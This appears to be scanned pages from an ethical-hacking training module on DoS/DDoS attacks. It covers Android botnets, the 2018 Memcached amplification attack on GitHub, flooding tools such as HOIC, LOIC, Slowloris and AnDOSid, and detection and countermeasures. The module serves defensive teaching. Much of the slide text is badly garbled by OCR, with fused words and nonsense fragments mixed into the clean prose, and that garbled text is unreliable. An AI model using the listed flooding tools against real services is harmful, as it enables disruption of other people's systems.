Page ical andCountermensores
Mackin
©
by
Copyright E-Comel
 Useof Mobile Devicesas Botnetsfor Launching
DDoSAttacks

unsecured
‘These Android
malware
Nehiyvaneabeto to
d ees are
are rimary tare fr attackersenlarge
becoming theebotnet
becausehey

alious Ano
store
and
eriv-by
downloads
are
aplatonsfoundintheGootlP ly jut few of
examples

Android
festures
T h estacker binds
Unwanted applation
andbefore
malcous
to
ath
themalls

party
appke
the
AK server othe
permissions dtr the
package
package
fl), encryptsandremoves
(APK
store Googe

UseofMobile Devicesas Botnetsfor Launching

DDoSAttacks
Androiddevicesare passively vulnerableto various malwaresuchas Trojans, bots,Remote
Trojans
‘Access (RATS),andso on, whichare oftenfoundi n third-party application stores.These
unsecuredandroiddevicesare becoming the primarytargetsfor attackersto enlarge their
botnetnetworkbecause
found in the Google Play they
are
highly are
vulnerable
Storeand as drive-by
to malware,
downloads examples
Theattackerbindsa maliciousserver to the androidapplication
Malicious

package
android applications
for infectionmethods.
(APK) file,encrypts it,
andremoves unwantedfeaturesandpermissions beforedistributing the maliciouspackage to a
third-party appstore suchas Google
andinstalling suchapplications, Once
PlayStore. the victims are trickedinto downloading
deviceis takenover bytheattackerandintegrated
thevictim’s
into the attacker'smobilebotnetto perform maliciousactivities suchas DDoSattacksandweb
Injections.

ical andCountermensores
Mackin ©by E-Comel
Copyright
DDoSCaseStudy:
DDoSAttackon GitHub
CEH
ary 2018,Gib encountered
a devastating ODS attack,whichmadets
volumetric service unavalable
to

“©
wort’
largest
Theis
000
the
attack
ever
recorded
Attack
Timeline
February2018
10 The attackm ae Gt com unaviable

of
7a0UTCde tos heeynow ta

at
10T h efist portion
ofthe tack peaked

DDoS Case Study:

DDoSAttack on GitHub (Cont'd)
[AttackMechanism

nghated
over
thousand
diferent
(©T h eattack
umigue autonomous
systems
endpoints across
rom
of
thousands (ASN) tens of

attack
works
(©The
abusing
instances
internet
with of
Memcached
servers
that
areaccessible
onthe
by
puble
enabled
UDPsuppor
nadvertety

byte
senstacker of
1@T h evulnerattyarisingrom this miscnfiguation
used an aplicationfactorof upto51,00,m eaning
tht
foreach bythe upto 1 was sent fowardte target

arpa
(©Wis age asada iow
devastating of Tops
13 datatowardGMb, nterupting

ical andCountermensores
Mackin ©by E-Comel
Copyright
 DDoSCaseStudy:
DDoSAttackon GitHub (Cont'd)
Response
‘Gittfub’s

1 was inatedva GitHubChatOps

tooling
t owitstaw BGPannouncements ove

Atoutesrecnvergdinthenest fe
of tant Bendwidth minutes
mikiated
andsca
evesandloadblancer
controlits

atUTE
the attacktthe border
responsecodesinated fall covery 1730

DDoSCaseStudy:
DDoSAttack on GitHub
Source:https://github.blog
GitHubisa renownedopen-source cloud platform usedas a repository bymanycompanies,
businesses,
andresearcherswithwideareas of interest. In February
2018,GitHubencountered
a devastating
DDoSattack,whichmadeits service unavailableto users for 4 min. Thiswas the
world’s
largestDDoSattackever recorded.
=
AttackTimeline
The DDoSattackoccurredon Wednesday, February28,2018.ThisvolumetricDDoS
attack madeGitHub.com unavailable
from 17:21 to 17:26 UTCand intermittently
unavailable
‘At
owing
from17:26to 17:30UTC
17:21UTC, GitHub’s
to a heavy
networkmonitoring
inflowof datapackets.
systemdetectedan anomaly i n the ratio of
andtheynotifiedthe on-callengineerandothers.The below
ingressto egresstraffic,
figure
over
transit
showsinboundversus outboundthroughput links.

-——V
——
10.25:I nbound
Figure versus outbound
throughputaver rani inks

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Thefirstportionoftheattackpeaked
at 1.35Tbps
via 126.9millionpackets
per second
(pps),
and a second400 Gbps occurreda little after 18:00UTC,Thebelowfigure,
spike
provided
byAkamai,showsinbound
traffici n bitsper second(bps).
‘ALL
BORDER
Bitsper Second

Wed,
28Feb201817:28:00
1387 GwT

Attack Mechanism
Figure
10.26:Inbound
traffic bits
per
second
Thisattackwas an amplification attackusinga Memcached-based approach that peaked
at 1.35Tops.Theattackoriginated fromover a thousanddifferentautonomous system
numbers(ASNs) across tens of thousands of unique endpoints.Theattackworkedby
abusing Memcached instancesthat were inadvertently on the public
accessible Internet
with UDP supportenabled. The spoofing of IP addressesallowed Memcached’s
responsesto betargeted againstanotheraddressand more datathan necessary to be
sent toward the target by the unspoofed source. The vulnerability
due to this
misconfigurationcausedan amplification factorof upto 51,000,
implying
that up to 51
KB was sent toward the target for each bytesent by the attacker.This large
amplificationfactorcausedthe devastating inflow of 1.3 TbpsdatatowardsGitHub,
its normaloperations.
interrupting
+
Response
Github’s
Given the inboundtransit bandwidthto over 100 Gbps
increase in i n one of GitHub’s
facilities,
GitHubpersonnel
decidedto move the incomingtrafficto Akamai.At 17:26
ChatOps
UTC,a commandwas initiated via GitHub’s toolingto withdraw Border
Gateway (BGP)
Protocol
the autonomous system belonging to GitHub,
exclusivelyover GitHub’s and
announcementsover transit providers announce AS36459,
linksto Akamai.
Routes reconvergedi n the next few minutes,and access control lists mitigatedthe
attackat their border.The monitoring
of transit bandwidthlevelsand load balancer

exchanges
GitHub’s
were withdrawnas a follow-up
network
at
responsecodesindicateda full recovery 17:30 UTC.At 17:34 UTC, routes to Internet
to shiftan additional40 Gbps awayfrom

ical andCountermensores
Mackin ©by E-Comel
Copyright
 iia
eee dg
Figure
After this incident,
versus
20.27Inbound outbound
throughput
over rast inks
GitHub revealedthat theywere investigating the use of their
monitoring infrastructure
to automate DDoSmitigation providers
andwouldcontinue to
measure response times to similarincidentswith a goal
of reducing
the mean time to
recovery(MTTR)

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ModuleFlow

DoS/DDoSAttack Tools
attacktools usedto take over a single
Thissection dealswith various DoS/DDoS or multiple
network systemto exhausttheir computing
resources or renderthem unavailableto their
intended
u sers.

ical
Mackin
and ©by CountermensoresCopyright
E-Comel
 DoS/DDoSAttackTools

Cannan(OIE)

Cannon010) Slowlrs con)

n/t

ofaerupting
Intention
the
DoS/DDoSAttackTools
+
HighOrbitlon Cannon(HOIC)
Source:https://sourceforge.net
HOICis a networkstressandDoS/DDoS attackapplicationwritten i n BASIClanguage.
It
is designed
requests
follows:
to attackup to 256targetURLS
to a computer
simultaneously.
that uses lulz-inspired
It sendsHTTPPOST
GUIs. Its featuresare summarized asand
GET
©.
High-speed flooding
multi-threadedHTTP
©
Simultaneous
flooding
websites ofup to 256
systemto allowthe deployment
Built-inscripting whichare scripts
of “boosters,―
designed to thwartDDoScountermeasuresandincrease DoSoutput
Portability
to Linux/Macwith a few bugfixes
Ability
Ability throttle
of with
to selectthe number threads i n an ongoingattack

to three
attacksindividually
settings: LOW,
MEDIUM,
andHIGH

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Figure
10.28%
Screenshot
ofHOIC
Ds attacktool
=
LowOrbitlon Cannon(LOIC)
Source:https://sourceforge.net
LOICis a networkstresstestingandDoSattackapplication.
LOICattacks
c an be called
application-based theyprimarily
DOSattacksbecause targetwebapplications.
LOICcan
beusedon a targetsite to floodthe server with TCP packets,
UDP packets,
or HTTP
withthe intention of disrupting
requests the service.

10.10.10.13

10.2: Screenshot
Figure ofLOIC
DoS
ata

ical andCountermensores
Mackin ©by E-Comel
Copyright
Thefollowing
are some oftheadditional
DoS/DDoS
attacktools
=
XOIC(http://anonhacktivism.blogspot.com)
=
HULK(https://siberianlaika.ru)
=
Hammer (https://sourceforge.net)
Tor’s
=
(https://aithub.com)
Slowloris
(hetps://sourceforge.net)
PyLoris
(https://sourceforge.net)
R-U-Dead-Yet

Module1 0Page
1227 tical MakingandCountermensores
by
Copyright©
Comet
 DoSand DDoSAttack Toolsfor Mobiles

DoS/DDoSAttackTools for Mobiles

*
Loic
Source:htps:/play.google.com
TheAndroidversion of LOICsoftwareis usedfor flooding
packets,whichallowsthe
attackerto perform Thisapplication
a DDoSattack on the targetorganization. can
performUPD, HTTP,or TCPfloodattacks.

10.30:
Figure Screenshot
of LOIC
09Sattacktoo
for
maile

Module0 1238
Page tical MakingandCountermensores
by
Copyright©
Comet
‘AnDosid
Source:https://andosid.droidinformer.org
allowsthe attackerto simulatea DoSattack(anHTTPPOST
AnDOSid flood attackto be
precise)
andDDoSattackon a webserver frommobilephones.
BHO 73600
[05

10,31:Screnshat afAnDOSIsDoSattacktoo formotile

Figure
PacketsGenerator
Source:https://play.google.com
ThePackets Generatorappallowsattackersto generate networktrafficincludingTCP
SYN, UDP, and ICMPpingtraffic.It is effectively
usedfor testing filtering
a firewall’
rules,an intrusion detectionsystem's anda router'saccess-control
attacksignatures,
lists(ACLs) bysending a series of generated
packetstowardsa target.

10.2: Screenshot
Figure ofPackets
Generator
ical
toolformobile

andCountermensores
Mackin ©by E-Comel
Copyright
 ModuleFlow

Countermeasures
D0S/DDoS is one of the foremost securitythreatson the Internet;thus,there is a great
necessity for solutionsto mitigatetheseattacks.Thissection discussesdetectionmethods,
various preventivemeasures,andresponses to DoS/DD0S attacks.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 DetectionTechniques

Aotivity
Profiling Sequential
ChangePointDetection
|| Based
tignal
Wavelet Analyse

DetectionTechniques
Early helppreventDoS/DDoS
detectiontechniques a D0S/DDoS
attacks.Detecting attackis a
tricky
task.A DoS/DDOSattacktrafficdetectorneedsto distinguish
betweena genuineanda
bogus
data packet,
whichis not always Therefore,
possible. the techniques
employed
for this
purposeare not perfect.
legitimate
Thereis alwaysa chance
networkuser andtrafficgenerated
of confusion
by aDoS/DDoS
between
traffic
generated
attack.Detectiontechniques
bya
are

fromlegitimate packet traffic. of

basedo n the identificationanddiscriminationan illegitimate
trafficincrease andflashevents

One problem
in filtering
bogus
traffic from legitimate
traffic is the volumeof traffic. It is
impossible datapacket
to scan each to ensure
All the detectiontechniques
security
froma DoS/DD0S
attack.
used todaydefinean attack as an abnormaland noticeable
Thesetechniques
deviation i n network traffic statistics and characteristics. involve the
statistical
analysis
Thefollowing
to
ofdeviations categorize malicious
are thethreetypesof detectiontechniques:
andgenuinetraffic.

=
ActivityProfiling
Activityprofiling
is performed basedon the averagepacket rate for networkflow,which
consists of consecutive packets with similarpacket headerinformation. The packet
headerinformationincludesthe IP addresses of the destinationand sender, and
ports,
transport protocols used.An attackis indicated
by
‘An levelsamongthe networkflowclusters
increasein activity
©. An increase in
of
theoverallnumber distinct clusters(DDoS
attack)

ical andCountermensores
Mackin ©by E-Comel
Copyright
For a higher
averagepacket
rate or activitylevel of a flow,the time between
consecutive matching
packets
is lower. Randomness i n the average packet
rate or
activitylevelcan indicate suspiciousactivity.Theentropycalculation
methodmeasures
randomness i n activitylevels.If a network is under attack,
the entropyof network
levels
activity increases.
Oneof the majorhurdlesin the activityprofiling methodis the huge volumeof traffic.
Thisproblem can be overcome byclustering packet flowswith similarcharacteristics.
Because DoSattacksgenerate a large numberof data packets that are very similar,an
increase i n the averagepacket rate or an increase i n the diversityof packetscould
indicate a DoSattack

Sequential Change-Point Detection

In the sequential change-point detectiontechnique, networktraffic is filtered byIP
addresses, targetedportnumbers, andcommunication protocols used,andthe traffic
flow data are storedi n a graphthat showsthe traffic flow rate versus time. Change-
algorithms
pointdetection isolatechanges
i n network
trafficstatisticsand i n trafficflow
rate causedbyattacks.
beoccurring.
If there is
a
drasticchange
in trafficflow rate,a DoS
attackmay

Thistechnique sum (CUSUM)

usesthecumulative algorithm
to identify
andlocateDoS
attacks.Thealgorithm calculatesdeviationsi n the actualversus expected
localaverage
time series.Thesequential
i n thetraffic change-point identifies
detectiontechnique the
typical scanningactivities of networkworms,
Signal
Wavelet-Based Analysis.
The wavelet analysis technique analyzesnetworktraffic i n terms of spectral
components.It dividesincomingsignals
into various frequencies
and analyzes
different
frequency
components separately.
Analyzingeachspectralwindow'senergyrevealsthe
presenceof anomalies.Thesetechniques checkfrequency components presentat a
specific a description
time and provide of those components.The presence of an

unfamiliar
indicates
network
activity.
frequency suspicious
network signal
‘A consistsof a time-localizeddata packetflow signal and background
noise. Wavelet-basedsignal analysis
filtersout the inputsignals of anomalous
traffic
flow from backgroundnoise. Normalnetworktraffic is generally low-frequency
traffic
During the high-frequency
an attack,
of
components a signal increase.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 DoS/DDoSCountermeasureStrategies

Use addtional t o absorb

capacity theattack

Requires
preplanning
andaddtionalresources

to maintainfunctionality
dentiyeel services whilestopping

Mhutting
Down
| downattack
Shutting
has
Down 6 shut allservices
uni the subsided

‘DoS/DDoS
CountermeasureStrategies
=
Absorbingthe Attack: In this strategy, additionalcapacity is usedto absorban attack,
whichrequirespreplanning. It alsorequires additionalresources. One disadvantage
associated
with this strategy is the cost of additionalresources,whichis incurredeven
whenno attacksa re underway.

DegradingServices: If it is not possibleto keep all services functioningduringa n attack,

it goodidea to keepat leastthe criticalservices functional.Forthis,the critical
is a
services are following
first identified, whichthe network,systems, andapplication
designs
are customized may help
to cut downthe noncriticalservices. Thisstrategy keep
thecritical
services functional.

Shutting all services are shutdownuntil an attackhas

DownServices:In this strategy,
subsided.Though
it may not be the idealchoice,it may be a reasonableresponse i n
somecases

ical andCountermensores
Mackin ©by E-Comel
Copyright
 DDoSAttackCountermeasures

@Protect secondary Vitims

©Detectand Neutralize Handlers

© Prevent
Potential tacks

@dettect Attacks

@ Miigateattacks

@ Post-attackForensics

DDoSAttack Countermeasures
Many
solutionshavebeenproposed
for mitigating
the effectsof a DDoSattack.However,
no
single
complete
solutionexiststhat can protectall knownformsof DDoSattacks.
Moreover,
attackerscontinually
devisenew methodsto perform
DDoSattacksto bypass
the security
solutions
employed.
The
following
examples
DD0Scountermeasures:
are

secondaryDeflect
for attack
=
Protect
Neutralize
attacks
victims

attacks
handlers
=

=
Mitigate
=

potential
Prevent attacks =
Post-attackforensics

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Protect
Secondary Victims andDetect and NeutralizeHandlers

Secondary
Victims
Protect

toregulary remain potected

Monitorsecuety
fromDDoS software
agent
Network
Tate Analysis

Increase awarenesssecur issues and

regarding Neutralize
SotnetHandlers

ar D005
handlers
(©Thre ey ever deployed

pplication,andscan al leseceved
for om onder pee render

builtin
naraware
andregulary
rope configure
andsoftware
the
update
defense mechanisms inthe
of systems
core
Spooted
Source
Address
ProtectSecondary
Victims
IndividualUsers
Thebestmethodto preventDDoSattacksis for secondary victim systems to prevent
themselves fromtakingpartin the attack,Thisdemands intensifiedsecurity
awareness
and prevention techniques.
Secondary regularly
victims must monitor their security to
remain protected fromDDoSagentsoftware. It must beensuredthat the system does
not installany DDoS agentprogram; further, DDoSagenttrafficmust not betransferred
into thenetwork.
Antivirusand anti-Trojan softwaremust beinstalledand updated regularly, as well as
softwarepatches to fix knownvulnerabilities.Moreover, awareness of security issues
andprevention techniques must be increasedamongall Internet users. It is important
to disableunnecessaryservices,uninstallunusedapplications, andscan all filesreceived
fromexternalsources. Becausethesetasksmayappeardaunting to the averageweb
user, the core hardwareand softwareof computing systems c ome with integrated
mechanisms that defendagainstmaliciouscodeinsertion. Therefore, the built-in
defensivemechanisms i n the core hardwareand softwareof the systems m ust be
properly configured and regularly updatedto avoidDDoS
countermeasureswill leaveattackerswith no DDoS
can launchDDoSattacks.
attacks.
attacknetworkthrough the
Employingabove
whichthey

NetworkServiceProviders.
Serviceprovidersand networkadministratorscan adoptdynamic pricing for their
network usageto charge secondary
potential victims for accessing
the Internet and

ical andCountermensores
Mackin ©by E-Comel
Copyright
 thereby
encouragethem to becomemore active in preventingthemselvesfrom
becoming
a partof a DDoS
attack.
DetectandNeutralize Handlers
‘An
importantmethodusedto stopDDoSattacksis to detectandneutralizehandlers.Thiscan
be achievedbynetworktrafficanalysis,
neutralizing and identifying
botnethandlers, spoofed
source addresses. DDoSattack-toolarsenal,
In the agent-handler the handlerworksas an
intermediary
for the attackerto initiate attacks.Analyzing
communication protocols
andtraffic
patternsbetweenhandlersandclientsor handlersand agentscan revealthe networknodes
infectedbythe handlers.Discovering the handlersi n the networkand disabling
themcan be a
quick methodof disrupting the DDoSattacknetwork,Because the numberof DD0Shandlers
deployed i n the network is muchlessthan the numberof agents, neutralizing
a few handlers
can possibly rendermultiple agentsuseless,
thereby thwarting DDoSattacks.
Furthermore,
there is a reasonableprobability
that the spoofed
source address
of DDoSattack
packets
will not represent
a valid source addressof the definite sub-network.Identifying
spoofeds ource addresseswill preventDDoSattackswith thoroughcomprehension
of
communication protocols
andtrafficamonghandlers,
clients,
andagents.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 PreventPotentialAttacks

theneaser
pactesleneras
peta
ot brevet
Secrest
ure ivvters
ever
rote
tom T e h
TP theratefound
oriound atic

|| seteetc TP
tgussttrngensies
toeunnahatted er pretecsamint
Haven
coniguing
errr eres

the
high
(©Fereduces

Trea
the
©reaows rotor
|| Wee
volume
inbound

eben BO
PreventPotentialAttacks
=
EgressFiltering
Egressfiltering of IP packets
scans the headers leaving a network.If the packets meet
specifications,
theycan beroutedout ofthe sub-networkfromwhichtheyoriginated
Onthe other hand, do not reachthe targeted
the packets addressif they fail to meet
the necessaryspecifications.
Egress filtering
ensures that unauthorizedor malicious
trafficnever leavesthe internalnetwork.
DDoS attacksgenerate spoofed IP addresses. Establishing
protocols to require any
legitimate packetthat leavesa company’s
network to have a source addressi n which
the networkportion matchesthe internalnetworkcan helpmitigate attacks.A properly
developed firewallforthe sub-networkcan filterout manyDDoSpackets with spoofed
IP source addresses.
Ifa.web server is vulnerableto a zero-day
attackknownonlyto the underground
hacker
community,a server can be vulnerableeven after applying all availablepatches.
if the user enablesegressfiltering,
However, theycan save the integrity by
of a system
keeping the server from establishing
limit the effectiveness
can berestrictedto the required thereby
traffic,
a
connection backto the attacker.Thiswouldalso
of manypayloads usedi n common exploits. Outboundexposure
ability
the attacker's
limiting to connect
to other systems
and gain access to tools that can enablefurther access into the
network.
Ingress
Filtering
Ingress
filtering
is a packet
filtering
technique
usedbymany InternetServiceProviders
(ISPs)
to preventthe source addressspoofing ingressfiltering
of Internet traffic.Thus,

ical andCountermensores
Mackin ©by E-Comel
Copyright
can indirectly typesof net abusebymaking
combatseveral Internettraffictraceableto
its true source. It protects flooding
against attacksthat originatefromvalid prefixes
(IP
addresses)
TCPIntercept
and
enables
the be itssource.
originator
to traced to true

is a traffic-filtering
TCPintercept feature i n routers to protectTCPservers from a TCP
SYN-flooding
attack,whichis a kindof DoSattack.In a SYN-flooding theattacker
attack,
sendsa huge
addresses
volumeof requests connect
are
unresolved.Thishuge
reachable,
not to with unreachable
return addresses.
the connections cannot be established
and remain
volumeof unresolvedopenconnections overwhelmsthe server
Asthe

maycause it to deny
‘and Consequently,
service even to valid requests. legitimate
users
maynot beableto connect to a website, accessemail, u sean FTPservice, andso on.
In the TCPintercept mode,a router intercepts the SYNpackets sent byclientsto a
server and matches themwith an extended a ccesslist. If a matchis obtained, then on
behalfof the destinationserver, the interceptsoftwareestablishes a connection with
the client.Similarly,the interceptsoftwarealso establishes a connectionwith the
destination server on behalf of the client. Once the two half connections are
established, the intercept softwarecombinesthem transparently. Thus,the TCP
interceptsoftwarepreventsfake connection attemptsfrom reaching the server by
acting as a mediatorbetweenthe server andclient throughout the connection.
Ratelimiting.
Ratelimitingi s a technique
usedto controlthe rate ofoutbound or inbound trafficof a
networkinterfacecontroller.Thistechnique effectively
reducesthe highvolumeof
inboundtrafficthat causes a DDoSattack.It is especially importantto employ this
techniquein hardwareappliances, i n whichthe techniqueis configuredto limit the rate
of requestson layers 4 and5 ofthe Open Systems Interconnection(SI)model.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 DeflectAttacks

ikesensor| tnd cert hacer andworms by simtng

DeflectAttacks
Systems also known as honeypots,
set up with limited security, act as enticement for an
revealsthat a honeypot
attacker.Recentresearch can imitate all aspectsof a network,
including its web servers,mailservers, andclients.Honeypots are intentionallyset up with low
security to gaintheattention of DDOS attackersand serve as a means for gaininginformation
about attackers, attacktechniques, andtoolsbystoringa recordof the system activities. DDoS
attackersattractedbya honeypot install handlersor agent codewithin the honeypot. This
avoidscompromising systems that are more sensitive. Honeypots not onlyprotectthe actual
system fromattackersbutalsokeep activities byrecording
trackof detailson the attackers’ the
activityinformation. Consequently, the honeypot owner can keep @record of the handler
and/oragent activity.Users can employ this knowledge to defendagainst any future DDoS
installationattacks.A defense-in-depth approach with InternetProtocol Security (IPSec) can be
usedat differentnetworkpointsto divert suspiciousDoStrafficto severalhoneypots.
‘There of honeypots:
are two differenttypes

=
honeypots
Low-interaction
=
High-interaction
honeypots
example
‘An for high-interaction honeypots is a honeynet. Honeynets form the security
infrastructure; i n other words, theysimulatethe complete layoutof a networkof computers
but are originally intendedfor “capturing―
attacks.Thegoalis to developa networkwhereinall
activities are controlledandtracked.Thisnetwork contains potential victim decoys,and the
networkeven has
real
computers runningrealapplications.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 =
KFSensor
Source:http://www.keyfocus.net
KFSensor is a Windows-based honeypot intrusion detectionsystem(IDS). It acts as a
honeypot designedto attract and detecthackers and worms bysimulating vulnerable
systemservices and Trojans. Byresponding with a n emulationof a real service,

KFSensor
reveal
of
can thenature an attackwhilemaintaining
the riskof compromise.
systems
Byactingas a decoy
andprovidea higher
total controlandavoiding
server, it can divert attacksfromcritical
levelofinformation than can beachieved usingfirewalls
(NIDS)
alone.
anda networkIDS

1.33;Screenshot
Figure ofSensor
Thefollowing
are examples
foradditional countermeasure (honeypot)
DoS/DD0S tools:
=

(https://github.com)
SSHHiPot
+

Axtillery
(https://github.com)

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Attacks
Mitigate
Load
Balancing Throttling Drop
Requests

on
crtcal
|| tata
1 tncrease
bandwidth
‘connections
to absorb servers
@Setroutersto

packets
sth lope
access server
throttles routers
nnque,
drop
and
when
soak

Replicate
servers
falsate
protection
addtional
ema
to

by
serves
1 the it
solve
provide
caeforte

to
see

1helps
Throting hepsn prevent
in preventing
ster
sop
to
to
requester
causes
equestbymaking
ale pursetat

in
Balance
outers
ladson each
omputing
server

power
with
architecture
a multple-server
‘This
method
manage
helps
heavy incoming
traf, 2 thattheserver ean
can continue
belare
he request

Attacks
Mitigate
LoadBalancing
Bandwidthproviders can increase bandwidthon criticalconnections i n case of a DDoS
attackto preventtheir servers fromshutting down. Using a replicated server model
provides additional failsafe protection.Replicated servers helpi n better load
management bybalancing loadson eachserver i n a multiple-server
architecture; they
alsoincrease normalnetworkperformance andmitigate theeffectof a DDoS attack
Throttling
Throttling
entailsthe settingup of routers for server accesswith a logic
to throttle
incoming trafficlevelsthat are safefor the server. “Min-max
fair server-centric router―
andmaximum throughput
throttles(minimum controls)
helpusers preventtheir servers
fromshuttingdown.Throttling
helps damage
i n preventing to servers bycontrolling the
DoStraffic.Thismethodhelps routers manageheavy incomingtrafficso that the server
can user trafficfromfakeDDoS
handleit, It alsofilterslegitimate attacktrafficandcan
be extendedto throttle DDoS attacktraffic while allowing legitimate user traffic for
betterresults.
majorlimitationof thismethodis that it may triggerfalsealarms.Occasionally,
‘A it may
allowmalicioustrafficto passthroughwhiledropping some legitimatetraffic.
DropRequests
methodis to droppackets
‘Another whenthe load increases. Usually, the router or
server performs this task. However,before continuing with a request, the system
inducesthe requester to dropthe request
bymaking themsolvea difficultpuzzle that
requiresa lot of memoryor computing power. Consequently,users of zambiesystems

ical andCountermensores
Mackin ©by E-Comel
Copyright
detecta performance
degradationand couldpossibly fromtaking
bedissuaded parti n
transferring
DD0Sattacktraffic.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Post-AttackForensics

“afc
pattem
‘Traffic
for
Pattern
can ‘The
analysis
attackraf romentering
preventing
outputof walepattemanalysis
administrators
helpnetwork
thelrnetworks
or leaving

i n updating
help
to develop

loadbalandng
andtoting
new filtering
techniques

pany countermeasures
to enhance a ndprotection
efclency ablty

he attack
nacesaty
block
further
Packet

‘Traceback ithe
sce
in iden true source of andtaking stept o

the Eventlg help i n identifyingsource of oS tai

analysis

Post-AttackForensics
TrafficPatternAnalysis
During a DDoS attack,the traffic patterntool stores post-attackdata,which users
analyzeto identify
characteristicsuniqueto theattacking traffic.Thesedata are helpful
i n updating
load balancingand throttlingcountermeasuresto enhancetheir efficiency
and protectionability.Moreover,DDoSattacktrafficpatternscan helpnetwork
administratorsdevelop new filtering techniques to preventDDoSattacktraffic from
enteringor leaving their networks.Analyzing DDOStrafficpatternscan also help
networkadministratorsensure that an attackercannot use their servers as a DDoS
platform
break
other
sites.
to
ZombieZapper
Tool
into

Whena companyis unableto ensure the securityof its servers anda DDoSattackstarts,
the networkIDSnotices the highvolumeof traffic,
whichindicatesa potential problem,
Thetargeted victim can run ZombieZapper
to stoppackets fromflooding
the system.
versions of ZombieZapper:
Thereare two one runs on UNIX,
while the other runs on
Currently,
Windows. thistool acts as a defensemechanism Trinoo,TribeFlood
against
Network(TFN),
Shaft,
andStacheldraht.
PacketTraceback
Packet tracebackrefersto tracing backattacktraffic.It is similarto reverse engineering
In this method,the targeted victim worksbackwardbytracing the packet to its source.
Once the victim identifiesthe true source, theycan take steps
to blockfurtherattacks
fromthat source bydeveloping
the necessary techniques.
preventive In addition,
packet
tracebackc an assist i n gainingknowledge
of the various toolsand techniques
that an

ical andCountermensores
Mackin ©by E-Comel
Copyright
attackeruses. This informationc an helpin developing
and implementing
different
filtering
techniques
to blockattacks
Analysis
Event Log
DDoSevent logs a ssisti n forensic andtheenforcement
investigation of laws, whichare
helpful whenan attackercauses severe financialdamage. Providersc an use honeypots
andothernetworksecurity mechanismssuchas firewalls,packet andserver
sniffers,
logsto store all the events that occurredduring the setupand execution of the attack.
Thisallowsnetworkadministratorsto recognizethe type of DDoSattack or the
combinationof attacksused.Routers, firewalls,
andIDSlogs c an be analyzed to identify

of
the source the DoStraffic.Further,
the attacker's
agencies.
networkadministrators
IP addresswith the helpof intermediary
can attempt to trace back
ISPsand law enforcement

ical andCountermensores
Mackin ©by E-Comel
Copyright
 to Defendagainst
Techniques Botnets

ovr coming ts database

updates

to Defendagainst
Techniques Botnets
Thereare four techniques
to defendagainst
botnets:
RFC 3704Filtering
RFC3704 is a basicaccess-control list (ACL)filter,whichlimitsthe impactof DDoS
attacksbyblocking trafficwith spoofed addresses.Thisfilter requirespackets sourced
from valid,allocatedaddressspacethat is consistent with the topology and space
allocation.A “bogonlist―
consistsof all unusedor reservedIPaddresses that shouldnot
come fromthe Internet. If a packet is sourced from any of the IP addresses fromthe
bogon list,then the packet is from a spoofed source IP,andthe filter shoulddropit.
System administrators shouldcheckwhetherthe ISPperforms RFC3704 filtering
i n the
cloudbeforetrafficenters the system. Because the bogon list changes
regularly,in case
the ISPdoesnot perform RFC3704filtering, the systemadministratormust manage
theirown bogon ACLrulesor switchto anotherISP.
CiscoIPSSourceIP Reputation
Filtering
Reputationservices help i n determining whetheran IP or service is a source of threat.
CiscoGlobalCorrelation, a new security capability
of CiscoIPS7.0,uses immense
securityintelligence.The CiscoSensorBase Network contains informationabout all
knownthreatson the Internet,suchas botnets, malwareoutbreaks, darknets, and
botnetharvesters. TheCiscoIPSmakesuse of thisnetworkto filter DoStrafficbeforeit
damages critical assets.To detect and preventmaliciousactivityeven earlier, it
incorporatesglobal threatdatainto its system,

ical andCountermensores
Mackin ©by E-Comel
Copyright
BlackHoleFiltering
Black-holefiltering i s a common technique to defendagainstbotnetsand,thus,to
preventDoS attacks.Blackholesrefer to networknodeswherein incomingtraffic is
discardedor dropped without informing the source that the data did not reachthe
intended recipient.Undesirabletraffic can be dropped before it enters a protected
networkwith a technique calledremotely triggeredblack-hole(RTBH) filtering.
Asthisis
a remotely triggered process,this filteringmust be performed i n conjunctionwith the
ISP.It uses Border Gateway Protocol(BGP) hostroutes to route trafficto the victim's
next hop.
servers to a “null0―

DDoSPreventionOfferings
from ISPor DDoSService
Thismethodis effectivein preventingIP spoofing
at the ISP level.Here,the ISP
scrubs/cleans
traffic before allowing
it to enter a user'sInternet link. Because this
service runs i nthe cloud,DDoSattacksdo not saturate the Internet links.In addition,
some third parties
offercloudDDoSpreventionservices.

IP SourceGuard(inCISCO)
or similarfeaturescan be enabledi n other routers to filter
trafficbasedon the DHCPsnoopingbinding or IP source bindings,
database which
preventbotsfromsending
spoofedpackets.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Additional DoS/DDoSCountermeasures

Additional DoS/DDoSCountermeasures
Implementing at proper places
defensivemechanisms byfollowing
proper measures allowsthe
heightening
of organizational
combating
DoS/DD0S
attacks:
Thefollowing
networksecurity.
a
is listof countermeasuresfor

"=
Usestrongencryption
mechanisms
suchas WPA andAES256for broadbandnetworks
to eavesdropping
defendagainst
are up-to-date
Ensurethat the softwareand protocols and scan the machines
thoroughly to detectany anomalous behavior
Updatethe kernelt o the latestreleaseanddisableunusedandinsecure services
Blockall inboundpackets from the service portsto blockthe traffic from
originating
reflection
servers
EnableTCPSYNcookieprotection
Preventthe transmissionof fraudulently
addressedpacketsat theISPlevel
Implement cognitiveradiosin the physical
layerto handlejammingand scrambling
attacks
Configure
thefirewallto deny
externalICMPtrafficaccess
Secureremote administration andconnectivity
testing.
Perform thorough inputvalidation
Stopdataprocessed bythe
attacker
Preventthe use of unnecessary
frombeing executed
functionssuchasgetsandstrepy
Preventthe return addresses frombeing overwritten

ical andCountermensores
Mackin ©by E-Comel
Copyright
 DoS/DDoSProtectionat ISPLevel

Eh Sse ce eerie tbo

1S offernthe cloudDDOSprotection
fo internet
links0 thattheydonotbecomesaturatedbythe

Inthe-doud
attack
redvects
DDeSprotection
atic
iP
Administrators
‘fected
can request15st
block
IP
the gna
andmove theirsiteto snother after

DoS/DDoSProtectionat ISPLevel
Oneof the bestwaysto defendagainst
DoSattacksis to blockthemat the gateway. Thistaskis
performed bythe contractedISP.ISPsoffera “clean pipes―
service-level
agreement that
